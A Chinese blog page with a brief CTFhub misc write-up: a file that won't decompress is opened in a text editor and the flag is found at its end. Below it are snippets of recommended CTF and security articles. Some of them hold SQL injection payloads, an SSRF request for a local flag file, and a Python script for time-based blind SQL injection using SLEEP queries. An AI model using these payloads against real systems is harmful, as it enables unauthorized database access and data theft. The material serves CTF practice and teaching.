CTFhub----你猜我是个啥

最新推荐文章于 2025-04-25 19:06:38 发布
最新推荐文章于 2025-04-25 19:06:38 发布
阅读量101 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/it_wzb/article/details/133581364
版权

开启环境,下载附件。

解压的时候发现:

既然不是压缩文件,那就用记事本打开看看

 

最后面有flag。 

A.SmallWhite
关注
CTF——MISC习题讲解(BJDCTF2020系列)
tlovejr的博客
03-09 4400
CTF——MISC习题讲解(BJDCTF2020系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下BJDCTF中杂项题目 一、[BJDCTF2020]你我是个啥 题目链接如下: 链接:https://pan.baidu.com/s/1EG6lGSh2ZOwIdlrU2An50A?pwd=zuc2 提取码:zuc2 下载后是一个压缩包,但是打开也好还是解压也好都是无法打开 用文本编辑器查看发现其实这是一个图片 保存为图片后发现是一个二维码,扫描看看是不是flag 扫描后发现,这个二
CTFHUB-web-SQL注入
ookami6497的博客
11-29 984
CTFHUB SQL
BUUCTF:[BJDCTF2020]你我是个啥
末初 - mochu7
10-05 2350
题目地址:https://buuoj.cn/challenges#[BJDCTF2020]%E4%BD%A0%E7%8C%9C%E6%88%91%E6%98%AF%E4%B8%AA%E5%95%A5 010 Editor打开,发现文件头是png的 修改后缀为.png,得到一张二维码,扫描结果如下: 010 Editor打开直接搜索文本字符flag flag{i_am_fl@g} ...
2021-02-20
qq_52552659的博客
02-20 93
补2021-02-14 CTFHub misc 你我是个啥 下载打开。 打不开,那就用记事本或图片打开。 记事本打开下拉到底,看到flag
CTF-Misc-[BJDCTF2020]你我是个啥
归子莫的博客
05-13 2013
CTF-Misc-[BJDCTF2020]你我是个啥 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Misc类,[BJDCTF2020]你我是个啥 思路 这类题目首先把文件下载下来,然后打不开 使用binwalk binwalk 藏藏藏.jpg 使用bless ubuntu安装bless sudo apt-
CTFHUB-SQL注入
2402_87387389的博客
01-16 766
CTFHUB-SQL注入
CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 572
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
ctfhub -SSRF
weixin_55702959的博客
02-09 679
内网访问 SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。 ?url=127.0.0.1/flag.php 抓包 伪协议读取文件 https://blog.youkuaiyun.com/qq_39431542/article/details/89483887 php伪协议: File:// 访问本地文件系统 http:// 访问 H
CTFHUB-SQL注入-整数型注入(一)
sev1n的博客
03-01 2423
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数型注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
ctfhub-web-信息泄露-弱口令/默认口令
2301_80162151的博客
02-29 737
弱口令是网络安全十大安全漏洞之一,所谓的口令其实就是我们的密码,而弱口令就是相对来说比较容易被破解的密码,它会对信息安全造成严重的安全隐患。弱口令我们可以简单的理解为能让别人随意就到的密码,比如abc、111、123、123456、88888888等等诸如此类的密码。除此之外大家都能知道的密码称之为弱口令。④口令为本人相关的名字字母,生日,易被发现的邮箱号,账号名昵称名。既然是弱口令就需要burp爆破,就在测试你密码本。既然是默认口令,在网站上是可以搜到的。将密码添加,简单输入一些弱口令密码。
[ICMP流量分析]CTFHUB------Length
Y4tacker的博客
08-28 8728
首先通过关键字过滤ICMP 之后,从题目Length出可能与长度有关,我们知道这个平台默认flag开头是ctfhub{},发现c与f相差3个ascii码值,查看数据包也是一样的 接下来把每条长度读取即可,根据记录可以得到flag #!/usr/bin/python # coding=utf8 # @Author:Y4tacker num = ord('c') num = 141 - num num_list = [不可能给你自己研究哈,不吃白食] new_list = [] for i in num
CTFHub-技能树-Web-密码口令-(弱口令/默认口令)
F4lC0n的博客
06-15 6145
CTFHub 弱口令 打开题目一看就是这样的界面: 首先试了几个常用的: admin/admin admin/admin888 admin/password admin/123456 都是user or password is wrong em~ 然后就用bp抓包,用户名盲是admin,密码用的top100之类的密码字典,试了两三种,愣是没有跑出来,怀疑人生,然后百度了一下答案,发现好多人admin/password过去的,em~ 题目改了?又去试了几下,然后把用户名跟密码都用top100跑了一下,还是
CTFHUB技能树--web前置--HTTP协议(入门级详细wp)
weixin_58391382的博客
10-23 622
本文仅记录本人自己写ctfhub技能树的过程,仅供参考,如有错误还请大佬在评论区指正 目录 请求方式 302跳转 Cookie 基础认证 请求方式 先看下题目要求 翻译一下: HTTP方法是GET 使用CTF**B方法,我会给你标志。 提示:如果您得到“HTTP方法不允许”错误,您应该请求index.php。 直接根据提示brup抓包更改头部即可 302跳转 打开后界面 翻译一下: 这里 没有flag 给我flag ...
网络安全零基础培训 L1-3 Kali命令基础
2401_86544210的博客
04-17 1258
Nmap(端口扫描器)Wireshark(数据包分析器)(应用于对无线局域网进行渗透测试的软件)(密码破解器)Nessus(很强大的漏洞扫描工具)OpenVAS(开源的漏洞扫描工具)Burp Suite(用于web应用安全测试的集成平台)SQLmap自动化的SQL注入工具wireshark网络协议分析工具(kali预装的这些软件包含了很多黑客会使用到的很多工具,但是不要用这些工具去私自攻击未授权的一些网站)
常见网络安全攻击类型深度剖析(二):SQL注入攻击——原理、漏洞利用演示与代码加固方法
迷路的小绅士之家
04-25 1314
SQL注入的本质是“将用户输入当作代码执行”的设计缺陷,其危害程度取决于数据库中存储的数据敏感程度。永远不要信任用户输入,即使是表单中的“正常字段”也可能成为攻击入口。通过严格遵循参数化查询、输入验证、最小权限等最佳实践,结合WAF和日志监控,可以将SQL注入的风险降至最低。下一篇文章将聚焦“DDoS攻击”,解析攻击者如何通过海量流量压垮服务器,以及企业应如何构建分布式防御体系。
系统与网络安全------弹性交换网络(1)
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
04-16 698
Trunk链路通过802.1Q协议在单条物理链路上传递多个VLAN数据。交换机为数据帧插入VLAN标签(Tag),接收方根据标签识别VLAN并转发。Native VLAN(默认VLAN 1)的帧不标记,两端需一致。
计算机网络中科大 - 第7章 网络安全(详细解析)-以及案例
专研计算机网络,数据通信,网络安全,系统集成
04-16 1226
核心技术说明加密算法认证机制Nonce、防重放攻击、数字签名报文完整性哈希算法、MAC、数字签名密钥管理KDC、CA、证书链网络安全措施防火墙、IDS、ACL、分组过滤实践协议攻击防御窃听、重放、IP欺骗、DoS及其防范措施。
常见网络安全攻击类型深度剖析(四):跨站脚本攻击(XSS)——分类、漏洞利用与前端安全防护
最新发布
迷路的小绅士之家
04-25 877
XSS的本质是“用户输入被错误地当作代码执行”,其防御需要前端与后端的协同作战:后端负责输入验证和数据清洗,前端通过安全API和CSP策略阻止脚本执行,同时借助现代框架的内置安全特性减少人为失误。对于开发者而言,应始终遵循“默认不信任任何用户输入”的原则,将XSS防御纳入Web开发的每个环节(从需求分析到上线部署)。下一篇文章将聚焦“入侵检测系统(IDS)与入侵防御系统(IPS)”,解析如何通过流量监控和实时阻断技术,构建网络安全的“第二道防线”。
SMB协议
m0_68037567的博客
04-22 608
SMB是用于局域网内资源共享的协议,支持文件传输、打印机访问和进程间通信,常见于Windows系统(如Windows共享文件夹)。使用Wireshark抓包,分析SMB流量中的异常请求(如畸形数据包、高频连接)。:攻击者截获SMB认证流量(NTLM哈希),并中继到其他服务器,冒充合法用户。部署IPS/IDS,配置规则检测SMB攻击流量(如Suricata规则)。:攻击者利用未修复的SMB漏洞(如CVE-2017-0144)。:攻击者通过SMB在内网传播恶意软件(如勒索软件、蠕虫)。
时间盲注 所需金币:50题目状态:未解出解题奖励:金币:50 经验:10 http://challenge-776e44f76934642d.sandbox.ctfhub.com:10800
04-03
### 时间盲注 SQL 注入攻防实现方式 时间盲注是一种基于布尔盲注的扩展形式,攻击者通过向数据库发送特定查询并观察响应时间来推断数据的存在与否。其核心在于利用 `SLEEP()` 或类似的函数让数据库延迟返回结果。 #### 原理概述 时间盲注的核心原理是通过构造特殊的 SQL 查询语句,使目标数据库在满足某些条件时执行延时操作。如果延时发生,则说明条件成立;反之则不成立。这种方式可以逐位提取出数据库中的敏感信息[^1]。 #### 实现方式 以下是时间盲注的具体实现过程: 1. **构造延时逻辑** 使用 `IF` 函数或者直接调用 `SLEEP()` 来控制数据库的行为。例如,在 MySQL 中可以通过以下语法触发延时: ```sql IF(条件, SLEEP(秒数), NULL); ``` 2. **判断字符是否存在** 利用 ASCII 编码逐一测字段的内容。假设要解用户名的第一个字母是否为 'a',可构造如下 payload: ```sql AND (SELECT CASE WHEN SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0), 1, 1)='a' THEN SLEEP(5) ELSE NULL END)=NULL; ``` 如果服务器响应超过设定的时间阈值(如 5 秒),则表示条件成立;否则失败。 3. **二分法优化效率** 虽然暴力枚举可行,但通常采用二分查找提高速度。比如先测试中间值 `'m'` 是否小于等于实际字符,再逐步缩小范围直到定位到确切字节。 4. **绕过 WAF 防护机制** 当存在 Web 应用防火墙或其他安全措施干扰正常注入流程时,可能需要调整请求格式或替换关键字规避检测。例如改写 `SLEEP` 成其他等效表达式,像 PostgreSQL 的 `pg_sleep()`, SQLite 的 `LIKEGLOB`. #### CTF 解题思路实例 假设有这样一个 URL 参数易受攻击: `http://example.com/vuln?id=1` 尝试提交下面的数据包验证漏洞是否存在以及如何获取隐藏表名长度: ```bash id=1' AND IF((LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1))>8,SLEEP(5),NULL)--+ ``` 成功后继续分解每一位置上的具体数值直至拼凑完整字符串为止。 --- ### 示例代码片段 这里给出一段 Python 自动化脚本用于辅助完成上述任务: ```python import requests from string import printable url = "http://example.com/vuln" true_condition_time = 5 # 设定超时时长作为区分标志 result = "" for i in range(1, 20): # 尝试读取前二十个字符 found_char = False for char in printable[:-6]: # 只考虑可见ASCII集内的成员 payload = f"' OR IF(SUBSTR((SELECT version()),{i},1)='{char}',SLEEP({true_condition_time}),null)-- " start_time = time.time() res = requests.get(url, params={"id":payload}) elapsed_time = time.time()-start_time if elapsed_time >= true_condition_time: result += char print(f"[+] Found character {char} at position {i}") break print("[*] Final extracted value:", repr(result)) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值